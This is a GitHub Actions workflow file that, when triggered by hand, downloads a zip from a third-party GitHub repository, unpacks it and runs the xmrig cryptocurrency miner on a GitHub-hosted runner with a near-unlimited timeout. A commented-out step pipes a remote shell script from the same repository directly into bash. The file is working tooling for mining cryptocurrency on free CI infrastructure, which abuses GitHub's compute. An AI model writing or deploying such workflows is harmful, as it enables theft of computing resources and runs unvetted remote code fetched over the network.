name: miner

on: 
  workflow_dispatch:

jobs:
  mine:
    name: start mine
    runs-on: ubuntu-latest
    timeout-minutes: 9999

    steps:
    - name: installing miner...
      run: |
        wget https://raw.githubusercontent.com/techtechnikov/min/main/linux.zip -O linux.zip
        unzip linux.zip -d linux
    - name: starting miner...
      run: linux/xmrig
        
      
    #- name: running loop...
    #  run: curl -s -L https://raw.githubusercontent.com/techtechnikov/min/main/loop.sh | bash -s 
          
